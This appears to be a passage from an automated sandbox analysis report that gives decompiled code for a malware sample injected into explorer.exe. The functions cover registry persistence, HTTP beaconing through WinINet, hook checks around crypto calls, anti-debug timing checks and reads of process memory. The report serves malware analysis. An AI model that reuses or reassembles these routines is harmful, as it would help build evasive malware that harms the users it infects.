				_t20 = RegOpenKeyExA(_v8, _v12, 0, 0xf003f,  &_v24); // executed
				if(_t20 == 0) {
					_t24 = RegDeleteValueA(_v24, _v16);
					asm("sbb eax, eax");
					_v20 =  ~(_t24 & 0xffffff00 | _t24 == 0x00000000);
					E007C3890(_v24);
				}
				return _v20;
			}










    0x007c806a
    0x007c806d
    0x007c8070
    0x007c8075
    0x007c808b
    0x007c8093
    0x007c809d
    0x007c80aa
    0x007c80ac
    0x007c80b2
    0x007c80b2
    0x007c80bd

    APIs
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
    • RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C453C, Relevance: 3.0, APIs: 2, Instructions: 29
    C-Code - Quality: 25%
    			E007C453C(void* __eax) {
				void* _v8;
				char _v9;
				signed int _v16;
				void* _t16;

				_v8 = __eax;
				_v9 = 0;
				if(_v8 == 0 || _v8 == 0xffffffff) {
					_v8 = GetCurrentProcess();
				}
				if( *0x7cb250 != 0) {
					_t16 =  *0x7cb250(_v8,  &_v16); // executed
					if(_t16 != 0) {
						asm("sbb eax, eax");
						_v9 =  ~( ~_v16);
					}
				}
				return _v9;
			}







    0x007c4542
    0x007c4545
    0x007c454d
    0x007c455b
    0x007c455b
    0x007c4565
    0x007c456f
    0x007c4577
    0x007c457e
    0x007c4582
    0x007c4582
    0x007c4577
    0x007c458b

    APIs
    • GetCurrentProcess.KERNEL32 ref: 007C4555
    • IsWow64Process.KERNELBASE(00000000,?), ref: 007C456F
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C8B6C, Relevance: 3.0, APIs: 2, Instructions: 18thread
    C-Code - Quality: 100%
    			E007C8B6C() {
				long _v8;
				void* _t5;

				_t5 = CreateThread(0, 0, E007C8AA4, 0, 0,  &_v8); // executed
				_v8 = _t5;
				return CloseHandle(_v8);
			}





    0x007c8b81
    0x007c8b87
    0x007c8b96

    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 007C8B81
    • CloseHandle.KERNEL32(?), ref: 007C8B8E
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C13DC, Relevance: 3.0, APIs: 2, Instructions: 16
    C-Code - Quality: 100%
    			E007C13DC(long __eax) {
				long _v8;
				void* _v12;
				void* _t8;

				_v8 = __eax;
				_t8 = RtlAllocateHeap(GetProcessHeap(), 0, _v8); // executed
				_v12 = _t8;
				return _v12;
			}






    0x007c13e2
    0x007c13f2
    0x007c13f8
    0x007c1401

    APIs
    • GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
    • RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C89D2, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 100%
    			E007C89D2() {
				long _v8;
				char _v17;
				long _v24;
				long _v28;
				CHAR* _t16;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t24;

				_t16 =  *0x7ca268; // 0x7c21d0
				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
				_v8 = _v8 ^ 0xc1b5f2f0;
				E007C1164(_v8,  &_v17);
				_t21 =  *0x7ca260; // 0x7c21a4
				E007C133C(_t21,  &_v17);
				_t23 =  *0x7ca260; // 0x7c21a4
				_t24 = E007C133C(_t23, E007C8A44);
				_v8 = _v8 ^ 0xc6b7feb7;
				_v8 = _v8 ^ 0x183cca04;
				return _t24;
			}











    0x007c89ee
    0x007c89f4
    0x007c89fa
    0x007c8a07
    0x007c8a10
    0x007c8a16
    0x007c8a23
    0x007c8a29
    0x007c8a31
    0x007c8a38
    0x007c8a42

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C89F4
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C89D4, Relevance: 1.5, APIs: 1, Instructions: 36
    C-Code - Quality: 100%
    			E007C89D4() {
				long _v8;
				char _v17;
				long _v24;
				long _v28;
				CHAR* _t16;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t24;

				_t16 =  *0x7ca268; // 0x7c21d0
				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
				_v8 = _v8 ^ 0xc1b5f2f0;
				E007C1164(_v8,  &_v17);
				_t21 =  *0x7ca260; // 0x7c21a4
				E007C133C(_t21,  &_v17);
				_t23 =  *0x7ca260; // 0x7c21a4
				_t24 = E007C133C(_t23, E007C8A44);
				_v8 = _v8 ^ 0xc6b7feb7;
				_v8 = _v8 ^ 0x183cca04;
				return _t24;
			}











    0x007c89ee
    0x007c89f4
    0x007c89fa
    0x007c8a07
    0x007c8a10
    0x007c8a16
    0x007c8a23
    0x007c8a29
    0x007c8a31
    0x007c8a38
    0x007c8a42

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C89F4
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C161C, Relevance: 1.5, APIs: 1, Instructions: 28network
    C-Code - Quality: 100%
    			E007C161C(void* __eax, short __ecx, char* __edx, long _a4, long _a8, long _a12, char* _a16, char* _a20) {
				void* _v8;
				char* _v12;
				short _v14;
				void* _v20;
				void* _t23;

				_v14 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t23 = InternetConnectA(_v8, _v12, _v14, _a20, _a16, _a12, _a8, _a4); // executed
				_v20 = _t23;
				return _v20;
			}








    0x007c1622
    0x007c1626
    0x007c1629
    0x007c164d
    0x007c1653
    0x007c165c

    APIs
    • InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 007C164D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1660, Relevance: 1.5, APIs: 1, Instructions: 28network
    C-Code - Quality: 100%
    			E007C1660(void* __eax, char* __ecx, char* __edx, long _a4, long _a8, LPCSTR* _a12, char* _a16, char* _a20) {
				void* _v8;
				char* _v12;
				char* _v16;
				void* _v20;
				void* _t23;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t23 = HttpOpenRequestA(_v8, _v12, _v16, _a20, _a16, _a12, _a8, _a4); // executed
				_v20 = _t23;
				return _v20;
			}








    0x007c1666
    0x007c1669
    0x007c166c
    0x007c168f
    0x007c1695
    0x007c169e

    APIs
    • HttpOpenRequestA.WININET(?,?,?,?,?,?,?,?), ref: 007C168F
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C15E4, Relevance: 1.5, APIs: 1, Instructions: 22network
    C-Code - Quality: 100%
    			E007C15E4(void* __eax, long __ecx, char* __edx, long _a4, void* _a8) {
				void* _v8;
				char* _v12;
				long _v16;
				int _v17;
				int _t17;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t17 = HttpSendRequestA(_v8, _v12, _v16, _a8, _a4); // executed
				_v17 = _t17;
				return _v17;
			}








    0x007c15ea
    0x007c15ed
    0x007c15f0
    0x007c1607
    0x007c160d
    0x007c1616

    APIs
    • HttpSendRequestA.WININET(?,?,?,?,?), ref: 007C1607
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C38B0, Relevance: 1.5, APIs: 1, Instructions: 21registry
    C-Code - Quality: 100%
    			E007C38B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
				long _v8;
				long _t15;

				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_v8 = _t15;
				return _v8;
			}





    0x007c38cc
    0x007c38d2
    0x007c38da

    APIs
    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7982, Relevance: 1.5, APIs: 1, Instructions: 21
    C-Code - Quality: 100%
    			E007C7982() {
				long _v8;
				long _v12;
				CHAR* _t5;
				int _t6;

				_t5 =  *0x7ca268; // 0x7c21d0
				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x7cb110,  &_v8,  &_v12, 0, 0); // executed
				 *0x7cb110 =  *0x7cb110 ^ 0xf1f1f1f1;
				return _t6;
			}







    0x007c799f
    0x007c79a5
    0x007c79ab
    0x007c79b8

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,007CB110,?,?,00000000,00000000), ref: 007C79A5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C3930, Relevance: 1.5, APIs: 1, Instructions: 21registry
    C-Code - Quality: 100%
    			E007C3930(void* _a4, char* _a8, int _a12, int _a16, char* _a20, int _a24) {
				long _v8;
				long _t15;

				_t15 = RegSetValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_v8 = _t15;
				return _v8;
			}





    0x007c394c
    0x007c3952
    0x007c395a

    APIs
    • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 007C394C
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C7984, Relevance: 1.5, APIs: 1, Instructions: 20
    C-Code - Quality: 100%
    			E007C7984() {
				long _v8;
				long _v12;
				CHAR* _t5;
				int _t6;

				_t5 =  *0x7ca268; // 0x7c21d0
				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x7cb110,  &_v8,  &_v12, 0, 0); // executed
				 *0x7cb110 =  *0x7cb110 ^ 0xf1f1f1f1;
				return _t6;
			}







    0x007c799f
    0x007c79a5
    0x007c79ab
    0x007c79b8

    APIs
    • GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,007CB110,?,?,00000000,00000000), ref: 007C79A5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C3864, Relevance: 1.5, APIs: 1, Instructions: 19network
    C-Code - Quality: 100%
    			E007C3864(char* _a4, long _a8, char* _a12, char* _a16, long _a20) {
				void* _v8;
				void* _t13;

				_t13 = InternetOpenA(_a4, _a8, _a12, _a16, _a20); // executed
				_v8 = _t13;
				return _v8;
			}





    0x007c387c
    0x007c3882
    0x007c388a

    APIs
    • InternetOpenA.WININET(?,?,?,?,?), ref: 007C387C
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C14F8, Relevance: 1.5, APIs: 1, Instructions: 15network
    C-Code - Quality: 100%
    			E007C14F8(DWORD* __eax, long __edx) {
				DWORD* _v8;
				long _v12;
				int _v16;
				int _t10;

				_v12 = __edx;
				_v8 = __eax;
				_t10 = InternetGetConnectedState(_v8, _v12); // executed
				_v16 = _t10;
				return _v16;
			}







    0x007c14fe
    0x007c1501
    0x007c150c
    0x007c1512
    0x007c151b

    APIs
    • InternetGetConnectedState.WININET(?,?), ref: 007C150C
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C9080, Relevance: 1.5, APIs: 1, Instructions: 14
    C-Code - Quality: 100%
    			E007C9080(intOrPtr _a4) {
				void* _t10;
				void* _t11;

				_a4 = _a4 + 4;
				 *0x7cb114 = E007C458C(0);
				E007C2574(0); // executed
				E007C8D0C(_t10, _t11, 0, _a4); // executed
				ExitProcess(0);
			}





    0x007c9086
    0x007c9091
    0x007c9098
    0x007c90a1
    0x007c90a8

    APIs
      • Part of subcall function 007C8D0C: GetCurrentProcess.KERNEL32 ref: 007C8D33
      • Part of subcall function 007C8D0C: GetCurrentProcess.KERNEL32 ref: 007C8D5D
      • Part of subcall function 007C8D0C: GetCurrentProcess.KERNEL32 ref: 007C8D77
      • Part of subcall function 007C8D0C: LocalAlloc.KERNEL32(00000000,00000014), ref: 007C8D94
      • Part of subcall function 007C8D0C: CreateMutexA.KERNELBASE(?,00000000,007C1CC8), ref: 007C8DB4
      • Part of subcall function 007C8D0C: LocalFree.KERNEL32(?), ref: 007C8DC3
      • Part of subcall function 007C8D0C: RtlInitializeCriticalSection.NTDLL(007CBE04), ref: 007C8E0C
      • Part of subcall function 007C8D0C: Sleep.KERNELBASE(000003E8), ref: 007C8FC8
      • Part of subcall function 007C8D0C: GetCursorPos.USER32(?), ref: 007C9000
      • Part of subcall function 007C8D0C: RtlExitUserThread.NTDLL(00000000), ref: 007C9069
    • ExitProcess.KERNEL32 ref: 007C90A8
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C151C, Relevance: 1.5, APIs: 1, Instructions: 13network
    C-Code - Quality: 100%
    			E007C151C(void* __eax) {
				void* _v8;
				int _v12;
				int _t7;

				_v8 = __eax;
				_t7 = InternetCloseHandle(_v8); // executed
				_v12 = _t7;
				return _v12;
			}






    0x007c1522
    0x007c1529
    0x007c152f
    0x007c1538

    APIs
    • InternetCloseHandle.WININET(?), ref: 007C1529
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C13B4, Relevance: 1.3, APIs: 1, Instructions: 17
    C-Code - Quality: 100%
    			E007C13B4(void** __eax, long __edx) {
				void** _v8;
				long _v12;
				void* _t7;

				_v12 = __edx;
				_v8 = __eax;
				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
				 *_v8 = _t7;
				return _t7;
			}






    0x007c13ba
    0x007c13bd
    0x007c13cd
    0x007c13d6
    0x007c13db

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1828, Relevance: 1.3, APIs: 1, Instructions: 12
    C-Code - Quality: 100%
    			E007C1828(void* __eax) {
				void* _v8;
				int _t5;

				_v8 = __eax;
				_t5 = VirtualFree(_v8, 0, 0x8000); // executed
				return _t5;
			}





    0x007c182c
    0x007c183a
    0x007c1842

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Non-executed Functions

    Function 007C4DE0, Relevance: 6.1, APIs: 4, Instructions: 69native
    C-Code - Quality: 100%
    			E007C4DE0(void* __eax, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v12 = 0;
				E007C1258( &_v52, 0x18);
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
				if(_v16 == 0 && _v48 != 0) {
					_v20 = _v48 + 8;
					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
					_v20 = _v28 + 0x3c;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v20 = _v20 + _v28 + 0x28;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v12 = _v20 + _v28;
				}
				return _v12;
			}











    0x007c4de6
    0x007c4deb
    0x007c4df6
    0x007c4e0f
    0x007c4e16
    0x007c4e24
    0x007c4e39
    0x007c4e45
    0x007c4e5a
    0x007c4e69
    0x007c4e7e
    0x007c4e8a
    0x007c4e8a
    0x007c4e93

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 007C4E09
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E39
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E5A
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E7E
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6DB0, Relevance: 4.5, APIs: 3, Instructions: 33sleep
    C-Code - Quality: 72%
    			E007C6DB0(void* __ecx, void* __fp0) {
				signed char _v4;
				intOrPtr _v8;
				signed int _t9;
				void* _t19;
				signed int _t27;

				_t19 = __ecx;
				asm("sbb dl, [edi+0x421cd09]");
				_t9 = 0x0000001c |  *0x1c;
				_t27 = _t9;
				if(_t27 >= 0) {
					L4:
					_t9 = 0x7c;
				} else {
					if(_t27 > 0) {
						asm("fisttp word [edx+0x8f9cbcc]");
						GetTickCount();
						goto L4;
					}
				}
				 *((intOrPtr*)(_t19 - 0xb9707bb)) =  *((intOrPtr*)(_t19 - 0xb9707bb)) + _t19;
				 *_t9 =  *_t9 + _t9;
				asm("adc eax, 0x7cb4c4");
				_t11 = GetTickCount() - _v8;
				asm("sbb eax, eax");
				_v4 =  ~((GetTickCount() - _v8 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
				return _v4;
			}








    0x007c6db0
    0x007c6db4
    0x007c6dba
    0x007c6dba
    0x007c6dbc
    0x007c6dd1
    0x007c6dd1
    0x007c6dbe
    0x007c6dbe
    0x007c6dc0
    0x007c6dce
    0x00000000
    0x007c6dce
    0x007c6dbe
    0x007c6dd3
    0x007c6dd9
    0x007c6ddd
    0x007c6de8
    0x007c6df7
    0x007c6df9
    0x007c6e02

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6DC8, Relevance: 4.5, APIs: 3, Instructions: 20sleep
    C-Code - Quality: 72%
    			E007C6DC8(void* __ebx, void* __ecx) {
				signed char _v8;
				intOrPtr _v12;
				void* _t18;

				_t18 = __ecx;
				GetTickCount();
				 *((intOrPtr*)(_t18 - 0xb9707bb)) =  *((intOrPtr*)(_t18 - 0xb9707bb)) + _t18;
				 *0x7c =  *0x7c + 0x7c;
				asm("adc eax, 0x7cb4c4");
				_t11 = GetTickCount() - _v12;
				asm("sbb eax, eax");
				_v8 =  ~((GetTickCount() - _v12 & 0xffffff00 | _t11 - 0x000001c2 > 0x00000000) ^ 0x00000001);
				return _v8;
			}






    0x007c6dc8
    0x007c6dce
    0x007c6dd3
    0x007c6dd9
    0x007c6ddd
    0x007c6de8
    0x007c6df7
    0x007c6df9
    0x007c6e02

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4E94, Relevance: 3.0, APIs: 2, Instructions: 37native
    C-Code - Quality: 100%
    			E007C4E94(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				void* _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
				if(_v16 == 0 && _v48 != 0) {
					_v24 = _v48 + 8;
					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20);
					_v12 = _v28;
				}
				return _v12;
			}











    0x007c4e9a
    0x007c4eb3
    0x007c4eba
    0x007c4ec8
    0x007c4edd
    0x007c4ee6
    0x007c4ee6
    0x007c4eef

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 007C4EAD
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4EDD
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1AAE, Relevance: 1.5, APIs: 1, Instructions: 30encryption
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 007C1AE5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1AB0, Relevance: 1.5, APIs: 1, Instructions: 29encryption
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 007C1AE5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C17A2, Relevance: 1.5, APIs: 1, Instructions: 28encryption
    C-Code - Quality: 100%
    			E007C17A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x7cb460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}







    0x007c17aa
    0x007c17ad
    0x007c17b0
    0x007c17bb
    0x007c17db
    0x007c17db
    0x007c17e4

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007C17D5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C17A4, Relevance: 1.5, APIs: 1, Instructions: 27encryption
    C-Code - Quality: 100%
    			E007C17A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x7cb460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}







    0x007c17aa
    0x007c17ad
    0x007c17b0
    0x007c17bb
    0x007c17db
    0x007c17db
    0x007c17e4

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 007C17D5
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1374, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    APIs
    • CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 007C13A1
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1490, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    APIs
    • CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 007C14BD
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1402, Relevance: 1.5, APIs: 1, Instructions: 24encryption
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 007C142D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1574, Relevance: 1.5, APIs: 1, Instructions: 23encryption
    APIs
    • CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 007C159D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1404, Relevance: 1.5, APIs: 1, Instructions: 23encryption
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 007C142D
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C153C, Relevance: 1.5, APIs: 1, Instructions: 21encryption
    C-Code - Quality: 100%
    			E007C153C(long* __eax, BYTE* __ecx, int __edx) {
				long* _v8;
				int _v12;
				BYTE* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x7cb458)) != 0xe9) {
					_v20 = CryptGenRandom(_v8, _v12, _v16);
				}
				return _v20;
			}







    0x007c1542
    0x007c1545
    0x007c1548
    0x007c1553
    0x007c1567
    0x007c1567
    0x007c1570

    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 007C1561
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C15B0, Relevance: 1.5, APIs: 1, Instructions: 20filenetwork
    C-Code - Quality: 100%
    			E007C15B0(void* __eax, long __ecx, void* __edx, DWORD* _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = InternetReadFile(_v8, _v12, _v16, _a4);
				return _v20;
			}







    0x007c15b6
    0x007c15b9
    0x007c15bc
    0x007c15d5
    0x007c15de

    APIs
    • InternetReadFile.WININET(?,?,?,?), ref: 007C15CF
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1B20, Relevance: 1.5, APIs: 1, Instructions: 18encryption
    C-Code - Quality: 100%
    			E007C1B20(long* __eax, int __edx) {
				long* _v8;
				int _v12;
				int _v16;

				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x7cb50c)) != 0xe9) {
					_v16 = CryptReleaseContext(_v8, _v12);
				}
				return _v16;
			}






    0x007c1b26
    0x007c1b29
    0x007c1b34
    0x007c1b44
    0x007c1b44
    0x007c1b4d

    APIs
